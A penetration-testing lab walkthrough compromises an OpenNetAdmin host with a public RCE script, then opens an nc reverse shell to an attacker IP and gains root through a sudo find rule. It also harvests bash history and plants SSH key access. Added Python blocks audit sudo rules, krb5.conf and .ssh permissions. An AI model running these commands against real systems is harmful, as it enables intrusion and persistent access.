nmap -sT -Pn -A 192.168.64.164

Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-27 06:32 EDT
Nmap scan report for 192.168.64.164
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 68:7a:c0:de:12:a9:07:98:1a:52:f8:45:ea:24:68:79 (RSA)
|   256 5c:b3:b9:48:73:e9:e4:01:6b:b7:9f:ee:0d:0c:ba:eb (ECDSA)
|_  256 ee:97:de:dd:52:f5:e1:bf:28:b4:4a:6b:93:42:ce:ee (ED25519)
**80/tcp open  http    Apache httpd 2.4.29**
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: OpenNetAdmin :: 0wn Your Network
| http-cookie-flags: 
|   /: 
|     ONA_SESSION_ID: 
|_      httponly flag not set
Service Info: Host: web05.complyedge.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 is open, so try enumerating possible paths:

gobuster dir -u http://192.168.64.164/ -w /usr/share/wordlists/dirb/common.txt -e

┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ gobuster dir -u http://192.168.64.164/ -w /usr/share/wordlists/dirb/common.txt -e                          2 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.64.164/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2022/07/27 06:41:15 Starting gobuster in directory enumeration mode
===============================================================
http://192.168.64.164/.htaccess            (Status: 403) [Size: 279]
http://192.168.64.164/.hta                 (Status: 403) [Size: 279]
http://192.168.64.164/.htpasswd            (Status: 403) [Size: 279]
http://192.168.64.164/config               (Status: 301) [Size: 317] [--> http://192.168.64.164/config/]
http://192.168.64.164/images               (Status: 301) [Size: 317] [--> http://192.168.64.164/images/]
http://192.168.64.164/include              (Status: 301) [Size: 318] [--> http://192.168.64.164/include/]
**http://192.168.64.164/index.php            (Status: 200) [Size: 24924]**
http://192.168.64.164/local                (Status: 301) [Size: 316] [--> http://192.168.64.164/local/]
http://192.168.64.164/modules              (Status: 301) [Size: 318] [--> http://192.168.64.164/modules/]
http://192.168.64.164/plugins              (Status: 301) [Size: 318] [--> http://192.168.64.164/plugins/]
http://192.168.64.164/server-status        (Status: 403) [Size: 279]

===============================================================
2022/07/27 06:43:22 Finished
===============================================================

Visiting http://192.168.64.164/index.php shows the following page:

[screenshot: 01.png]

There is an RCE exploit for this application on exploit-db: https://www.exploit-db.com/exploits/47691. Google turns up many others; the Python one at https://github.com/amriunix/ona-rce is used here.

┌──(kali㉿kali)-[~/…/osep/Challenge/5/ona-rce]
└─$ **python3 ona-rce.py exploit http://192.168.64.164/index.php**                                                 1 ⨯
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh$ **rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.64 80 >/tmp/f**

A reverse shell comes back:

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.64] from (UNKNOWN) [192.168.64.164] 49806
sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ **python -c 'import pty;pty.spawn("/bin/bash")'**
www-data@web05:/opt/ona/www$ find / -name local.txt 2>/dev/null
find / -name local.txt 2>/dev/null
www-data@web05:/opt/ona/www$ **sudo -l**
sudo -l
Matching Defaults entries for www-data on web05:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on web05:
    **(root) NOPASSWD: /usr/bin/find**

Privilege escalation method: https://gtfobins.github.io/gtfobins/find/

www-data@web05:/opt/ona/www$ **sudo /usr/bin/find . -exec /bin/sh \; -quit**
sudo /usr/bin/find . -exec /bin/sh \; -quit
# id
id
uid=0(root) gid=0(root) groups=0(root)
# find / -name proof.txt 2>/dev/null
find / -name proof.txt 2>/dev/null
/root/proof.txt
# cat /root/proof.txt
cat /root/proof.txt
84d6b516a612290c442acc8aa20032d0
# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.64.164  netmask 255.255.255.0  broadcast 192.168.64.255
        inet6 fe80::250:56ff:fe86:8172  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:86:81:72  txqueuelen 1000  (Ethernet)
        RX packets 7915  bytes 1039329 (1.0 MB)
        RX errors 0  dropped 176  overruns 0  frame 0
        TX packets 6879  bytes 3196524 (3.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet **172.16.64.164**  netmask 255.255.255.0  broadcast 172.16.64.255
        inet6 fe80::250:56ff:fe86:5af8  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:86:5a:f8  txqueuelen 1000  (Ethernet)
        RX packets 3841  bytes 358553 (358.5 KB)
        RX errors 0  dropped 63  overruns 0  frame 0
        TX packets 3952  bytes 372441 (372.4 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 708  bytes 56432 (56.4 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 708  bytes 56432 (56.4 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

# **python -c 'import pty;pty.spawn("/bin/bash")'**
python -c 'import pty;pty.spawn("/bin/bash")'
root@web05:/opt/ona/www#

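The `(root) NOPASSWD: /usr/bin/find` rule above is the whole privilege escalation, so it is worth having an audit that spots such rules before an attacker does. The following is an added example, not code from the write-up: it parses the text that `sudo -l` prints (the sample below is constructed in that format; only the `find` rule is taken from web05, the second rule is made up) and reports passwordless root rules on binaries that can run arbitrary commands. The `SHELL_CAPABLE` set holds only `find`, since that is the one binary the write-up covers; a real audit would populate it from GTFOBins.

```python
"""Flag passwordless-root sudo rules on binaries that can spawn commands.

Added example, not part of the write-up: parses the text that 'sudo -l'
prints and reports rules like the '(root) NOPASSWD: /usr/bin/find' seen on
web05, where find's -exec lets the caller run anything as root.
"""
import os
import re
from dataclasses import dataclass
from typing import List, Tuple

# Binaries that execute arbitrary commands when run via sudo. Only 'find'
# comes from the write-up; a real audit would take the full list from GTFOBins.
SHELL_CAPABLE = {"find"}

# Matches "(root) NOPASSWD: /usr/bin/find", "(root : root) ALL", "(ALL) ALL" ...
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

# Constructed sample in the format of the write-up's output; the second rule is made up.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on web05:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User www-data may run the following commands on web05:
    (root) NOPASSWD: /usr/bin/find
    (root) /usr/bin/apt-get update, /usr/bin/systemctl restart apache2
"""


@dataclass
class SudoRule:
    runas_user: str      # first element of the "(user : group)" spec
    nopasswd: bool
    commands: List[str]


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Parse the rule block that follows 'User X may run the following commands'."""
    rules: List[SudoRule] = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0].strip()
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        commands = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append(SudoRule(runas_user, "NOPASSWD" in tags, commands))
    return rules


def find_risky(rules: List[SudoRule]) -> List[Tuple[str, str]]:
    """Return (runas, command) pairs that give unattended root command execution."""
    risky: List[Tuple[str, str]] = []
    for rule in rules:
        if rule.runas_user not in ("root", "ALL") or not rule.nopasswd:
            continue
        for cmd in rule.commands:
            # A rule may carry arguments; the binary is the first token.
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL" or binary in SHELL_CAPABLE:
                risky.append((rule.runas_user, cmd))
    return risky


if __name__ == "__main__":
    for runas, cmd in find_risky(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"RISK: ({runas}) NOPASSWD: {cmd}")
```

Run against real output with `sudo -l -U <user> | python3 audit.py`-style plumbing, or against a collected inventory of `sudo -l` captures; the fix for a hit is to drop `NOPASSWD` or to constrain the rule to exact arguments that cannot reach `-exec`.
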
Continue looking for useful information:

# cat /etc/passwd|grep /bin/bash
cat /etc/passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
offsec:x:1000:1000:Offsec,,,:/home/offsec:/bin/bash
# ls     
ls
config           images     local       modules  workspace_plugins
config_dnld.php  include    login.php   plugins
dcm.php          index.php  logout.php  winc
# pwd
pwd
/opt/ona/www
# cd /
cd /
# pwd
pwd
/
# ls
ls
bin   home            lib64       opt   sbin  tmp      vmlinuz.old
boot  initrd.img      lost+found  proc  snap  usr
dev   initrd.img.old  media       root  srv   var
etc   lib             mnt         run   sys   vmlinuz
# cd home
cd home
# ls
ls
**[email protected]  offsec  [email protected]**
# ls -alh
ls -alh
total 20K
drwxr-xr-x  5 root                         root                        4.0K Jul 16  2020 .
drwxr-xr-x 23 root                         root                        4.0K Jul 16  2020 ..
drwxr-xr-x  3 [email protected] domain [email protected] 4.0K Jul 16  2020 [email protected]
drwxr-xr-x  5 offsec                       offsec                      4.0K Jul 16  2020 offsec
drwxr-xr-x  5 [email protected]          domain [email protected] 4.0K Aug  2  2020 [email protected]
# cd [email protected]
cd [email protected]
# ls -alh
ls -alh
total 36K
drwxr-xr-x 5 [email protected] domain [email protected] 4.0K Aug  2  2020 .
drwxr-xr-x 5 root                root                        4.0K Jul 16  2020 ..
**-rw------- 1 [email protected] domain [email protected]  456 Jul 16  2020 .bash_history**
-rw-r--r-- 1 [email protected] domain [email protected]  220 Jul 16  2020 .bash_logout
-rw-r--r-- 1 [email protected] domain [email protected] 3.7K Jul 16  2020 .bashrc
drwx------ 2 [email protected] domain [email protected] 4.0K Jul 16  2020 .cache
drwx------ 3 [email protected] domain [email protected] 4.0K Jul 16  2020 .gnupg
-rw-r--r-- 1 [email protected] domain [email protected]  807 Jul 16  2020 .profile
drwx------ 2 [email protected] domain [email protected] 4.0K Jul 16  2020 .ssh
# cat .bash_history
cat .bash_history
exit
sudo shutdown -r
sudo reboot
exit
ls /tm
ls /tmp
sudo nano /etc/ssh/sshd_config 
ls /tmp/
id pete@complyedge
ls /tmp/
kinit
exit
ls /tmp
kinit
realm list
**kinit [email protected]**
**sudo nano /etc/krb5.conf** 
exit
ls /tmp
kinit
reboot
exit
ls /tmp
kinit
ping dmzdc01
realm list
kinit -V
ls /tmp
kinit -V [email protected]
kinit -V [email protected]
ls -la /tmp
klist
ls
ls -la
cd .ssh
ls
mv authorized_keys ../
ls
cd ..
ls
exit
ls /tmp
klist
exit
y

Check the contents of /etc/krb5.conf:

# cat /etc/krb5.conf
cat /etc/krb5.conf
[logging]
 default = FILE:/var/log/krb5libs.log
 kdc = FILE:/var/log/krb5kdc.log
 admin_server = FILE:/var/log/kadmind.log

[libdefaults]
 default_realm = COMPLYEDGE.COM
 dns_lookup_realm = false
 dns_lookup_kdc = false
 ticket_lifetime = 24h
 renew_lifetime = 7d
 forwardable = true
 rdns = false

[realms]
 COMPLYEDGE.com = {
   kdc = dmzdc01.complyedge.com
   default_domain = complyedge.com
}

[domain_realm]
 .complyedge.com = COMPLYEDGE.COM
 complyedge.com = COMPLYEDGE.COM

[appdefaults]
 pam = {
  minimum_uid = 3000
}
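Note that the `[realms]` stanza above is spelled `COMPLYEDGE.com` while `default_realm` is `COMPLYEDGE.COM`. MIT Kerberos compares realm names case-sensitively, and with `dns_lookup_kdc = false` there is no DNS fallback, so a `kinit` for `COMPLYEDGE.COM` has no KDC to contact. The following lint is an added example, not part of the write-up; it parses the krb5.conf format (sections, `key = value`, nested `{ }` blocks) and reports realm references that have no exactly matching stanza. The config embedded in it is the one printed above, plus a corrected copy to show a clean run.

```python
"""Lint a krb5.conf for the realm-name mismatch visible in the web05 file.

Added example, not from the write-up. MIT Kerberos matches realm names
case-sensitively, so a [realms] stanza named COMPLYEDGE.com does not serve a
default_realm of COMPLYEDGE.COM; with dns_lookup_kdc = false the client then
has no KDC to talk to.
"""
from typing import Dict, List

# Copied from the write-up's 'cat /etc/krb5.conf' output.
WEB05_KRB5_CONF = """\
[logging]
 default = FILE:/var/log/krb5libs.log
 kdc = FILE:/var/log/krb5kdc.log
 admin_server = FILE:/var/log/kadmind.log

[libdefaults]
 default_realm = COMPLYEDGE.COM
 dns_lookup_realm = false
 dns_lookup_kdc = false
 ticket_lifetime = 24h
 renew_lifetime = 7d
 forwardable = true
 rdns = false

[realms]
 COMPLYEDGE.com = {
   kdc = dmzdc01.complyedge.com
   default_domain = complyedge.com
}

[domain_realm]
 .complyedge.com = COMPLYEDGE.COM
 complyedge.com = COMPLYEDGE.COM

[appdefaults]
 pam = {
  minimum_uid = 3000
}
"""

# Same file with the stanza name corrected; used to show a clean run.
FIXED_KRB5_CONF = WEB05_KRB5_CONF.replace("COMPLYEDGE.com = {", "COMPLYEDGE.COM = {")


def parse_krb5_conf(text: str) -> Dict[str, dict]:
    """Parse the INI-with-braces format into nested dicts: {section: {key: str|dict}}."""
    conf: Dict[str, dict] = {}
    stack: List[dict] = []          # innermost open block is stack[-1]
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()   # strip comments
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            if len(stack) > 1:
                raise ValueError(f"section {line} opened inside an unclosed '{{' block")
            stack = [conf.setdefault(line[1:-1], {})]
            continue
        if not stack:
            raise ValueError(f"value outside any section: {line!r}")
        if line == "}":
            if len(stack) < 2:
                raise ValueError("unbalanced '}'")
            stack.pop()
            continue
        key, sep, value = line.partition("=")
        if not sep:
            raise ValueError(f"malformed line: {line!r}")
        key, value = key.strip(), value.strip()
        if value == "{":
            stack.append(stack[-1].setdefault(key, {}))
        else:
            stack[-1][key] = value
    if len(stack) > 1:
        raise ValueError("unclosed '{' block at end of file")
    return conf


def lint_realms(conf: Dict[str, dict]) -> List[str]:
    """Report realm references that have no exactly-matching [realms] stanza."""
    findings: List[str] = []
    libdefaults = conf.get("libdefaults", {})
    realms = conf.get("realms", {})
    default_realm = libdefaults.get("default_realm")
    if default_realm and default_realm not in realms:
        near = [r for r in realms if r.upper() == default_realm.upper()]
        hint = f" (case differs from stanza {near[0]!r})" if near else ""
        findings.append(f"default_realm {default_realm!r} has no [realms] stanza{hint}")
    # MIT's default for dns_lookup_kdc is true; when it is off, every realm needs a kdc line.
    if libdefaults.get("dns_lookup_kdc", "true").lower() != "true":
        for name, body in realms.items():
            if not isinstance(body, dict) or "kdc" not in body:
                findings.append(f"realm {name!r} lists no kdc and DNS KDC lookup is off")
    for domain, realm in conf.get("domain_realm", {}).items():
        if realm not in realms:
            findings.append(f"domain_realm {domain!r} -> {realm!r}, which has no [realms] stanza")
    return findings


if __name__ == "__main__":
    for f in lint_realms(parse_krb5_conf(WEB05_KRB5_CONF)):
        print("FINDING:", f)
```

On the web05 file this yields three findings (the default_realm case mismatch and the two `domain_realm` mappings pointing at the undefined upper-case realm); the corrected copy yields none.
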

When setting up passwordless (key-based) login, if there is no authorized_keys file, the public key has to be written into a newly created authorized_keys. The owner and group of authorized_keys also matter: if they are set incorrectly, the login attempt will still prompt for a password. (Taking the offsec user as the example: after privilege escalation, the files that were created have to be changed from root:root to offsec:offsec. The .ssh directory should be mode 0700 and owned by the current user and group, and the authorized_keys file should be mode 0600.)

For passwordless login, a few parameters in /etc/ssh/sshd_config need to be set; whether all of them are required still has to be tested.

root@web05:/home/offsec/.ssh# echo '**PubkeyAuthentication yes**' >> /etc/ssh/sshd_config
root@web05:/home/offsec/.ssh# echo '**RSAAuthentication yes**' >> /etc/ssh/sshd_config
root@web05:/home/offsec/.ssh# echo '**AuthorizedKeysFile %h/.ssh/authorized_keys**' >> /etc/ssh/sshd_config
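The ownership and permission mistakes described above are also what a defender looks for: an authorized_keys file in a user's home that is owned by root, or a world-readable .ssh directory, is a classic sign of a planted key. The block below is an added example, not code from the write-up. Its mode thresholds are the 0700/0600 the text sets, which is stricter than what sshd's `StrictModes` enforces (sshd only rejects group/world-writable files), and the root-owned case from the text shows up as an ownership finding. It also covers a caveat on the three `echo ... >> sshd_config` lines: sshd takes the first value it reads for each keyword, so appending to the end of the file only has effect for keywords not already set earlier (and `RSAAuthentication` is a protocol 1 keyword that OpenSSH 7.x accepts only as a deprecated no-op). `make_demo_home` builds a constructed home directory with lax permissions so the checker can be run offline.

```python
"""Audit ~/.ssh for the ownership/permission mistakes discussed above, and
report which sshd_config lines actually take effect.

Added example (not from the write-up). It assumes Linux-style uid ownership
and the sshd rule that the FIRST occurrence of a keyword wins, so lines
appended to the end of sshd_config are ignored when the keyword was already
set earlier in the file. Match blocks are not modelled.
"""
import os
import stat
import tempfile
from typing import Dict, List, Tuple


def check_ssh_layout(home_uid: int, ssh_mode: int, ssh_uid: int,
                     ak_mode: int, ak_uid: int) -> List[str]:
    """Pure check on owners and permission bits of ~/.ssh and authorized_keys.

    Ownership mismatches are the planted-key indicator; the mode checks use the
    0700/0600 targets from the text (sshd itself only rejects group/world-writable).
    """
    findings: List[str] = []
    if ssh_uid != home_uid:
        findings.append(f".ssh owned by uid {ssh_uid}, home owned by uid {home_uid}")
    if ssh_mode & 0o077:
        findings.append(f".ssh mode {ssh_mode:04o} is group/world accessible (want 0700)")
    if ak_uid != home_uid:
        findings.append(f"authorized_keys owned by uid {ak_uid}, not the home owner")
    if ak_mode & 0o077:
        findings.append(f"authorized_keys mode {ak_mode:04o} is group/world accessible (want 0600)")
    return findings


def audit_home(home: str) -> List[str]:
    """Stat a real home directory and run check_ssh_layout on what is there."""
    ssh_dir = os.path.join(home, ".ssh")
    ak = os.path.join(ssh_dir, "authorized_keys")
    if not os.path.isdir(ssh_dir) or not os.path.isfile(ak):
        return []                      # nothing key-based to audit
    home_st, ssh_st, ak_st = os.stat(home), os.stat(ssh_dir), os.stat(ak)
    return check_ssh_layout(home_st.st_uid,
                            stat.S_IMODE(ssh_st.st_mode), ssh_st.st_uid,
                            stat.S_IMODE(ak_st.st_mode), ak_st.st_uid)


def make_demo_home() -> str:
    """Constructed home dir with a lax .ssh (0755) and authorized_keys (0644)."""
    home = tempfile.mkdtemp(prefix="demo_home_")
    ssh_dir = os.path.join(home, ".ssh")
    os.mkdir(ssh_dir)
    ak = os.path.join(ssh_dir, "authorized_keys")
    with open(ak, "w") as f:
        f.write("ssh-ed25519 AAAA...constructed-placeholder-key demo\n")
    os.chmod(ssh_dir, 0o755)           # mkdir honours umask, so set explicitly
    os.chmod(ak, 0o644)
    return home


def sshd_effective(text: str) -> Tuple[Dict[str, str], List[str]]:
    """Return {keyword: value} as sshd will use it (first occurrence wins,
    keywords are case-insensitive) plus the lines shadowed by an earlier one."""
    effective: Dict[str, str] = {}
    shadowed: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1] if len(parts) > 1 else ""
        if key in effective:
            shadowed.append(line)
        else:
            effective[key] = value
    return effective, shadowed


# Constructed sample, not the real web05 file: an appended "yes" after an earlier "no".
SAMPLE_SSHD_CONFIG = """\
Port 22
PubkeyAuthentication no
PasswordAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile %h/.ssh/authorized_keys
"""


if __name__ == "__main__":
    for finding in audit_home(make_demo_home()):
        print("FINDING:", finding)
    effective, shadowed = sshd_effective(SAMPLE_SSHD_CONFIG)
    print("effective PubkeyAuthentication:", effective["pubkeyauthentication"])
    print("shadowed lines:", shadowed)
```

Pointing `audit_home` at every entry under /home (and at /root) gives a quick sweep for the scenario in the text, where a root shell drops a key into another user's .ssh.
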